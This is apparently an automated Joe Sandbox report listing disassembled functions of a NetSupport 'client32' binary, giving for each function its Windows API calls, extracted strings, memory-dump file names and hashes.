                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                              • String ID:
                                                                              • API String ID: 4100900918-3916222277
                                                                              • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                              • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                              • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                              • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                              Function 1101F0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 116windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 1101F0FE
                                                                              • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                              • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                              • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                              • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                              • _memset.LIBCMT ref: 1101F1CF
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                              • __strdup.LIBCMT ref: 1101F221
                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                              • String ID: 0$MakeOwnerDraw
                                                                              • API String ID: 1249465458-1190305232
                                                                              • Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                              • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                              • Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                              • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                              Function 1112B9B0 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 100libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
                                                                              • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
                                                                              • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
                                                                              • GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
                                                                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
                                                                              • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                              • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                              • API String ID: 2449869053-2279908372
                                                                              • Opcode ID: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
                                                                              • Instruction ID: 1bba0573f20789ca060975004b1edadb32616992e73bf794dbb13e42fcf3a639
                                                                              • Opcode Fuzzy Hash: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
                                                                              • Instruction Fuzzy Hash: 5231B371B11228ABEB249F758C55FEEF7B8EF8A315F104199FA09A7280DA705D408F94
                                                                              Function 1102370A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
                                                                                • Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
                                                                                • Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1
                                                                              • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102384D
                                                                              • ShowWindow.USER32(?,00000003), ref: 110238D1
                                                                              • LoadMenuA.USER32(00000000,000013A3), ref: 110239FB
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 11023A09
                                                                              • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023A29
                                                                              • GetDlgItem.USER32(?,000013B2), ref: 11023A3C
                                                                              • GetWindowRect.USER32(00000000), ref: 11023A43
                                                                              • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023A99
                                                                              • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 11023AA3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                              • String ID: AddToJournal$Chat
                                                                              • API String ID: 693070851-2976406578
                                                                              • Opcode ID: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                              • Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
                                                                              • Opcode Fuzzy Hash: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                              • Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95
                                                                              Function 110A1460 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 285timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetLocalTime.KERNEL32(?), ref: 110A1778
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                                              • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 2014016395-1677429133
                                                                              • Opcode ID: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
                                                                              • Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
                                                                              • Opcode Fuzzy Hash: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
                                                                              • Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5
                                                                              Function 11131320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                              • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastShowWindow
                                                                              • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                              • API String ID: 3252650109-4091810678
                                                                              • Opcode ID: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                              • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                              • Opcode Fuzzy Hash: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                              • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                              Function 110F7300 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 137libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,EE49F673,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                              • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                              • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                              • API String ID: 2188719708-2019804778
                                                                              • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                              • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                              • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                              • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                              Function 1103F520 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                              • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                              • wsprintfA.USER32 ref: 1103F5D1
                                                                              • GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
                                                                              • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
                                                                              • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                              • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                              • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                              • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1300213680-78349004
                                                                              • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                              • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                              • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                              • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                              Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 1105F251
                                                                              • wsprintfA.USER32 ref: 1105F265
                                                                                • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,75A78400,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                              • wsprintfA.USER32 ref: 1105F5D6
                                                                                • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                              • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
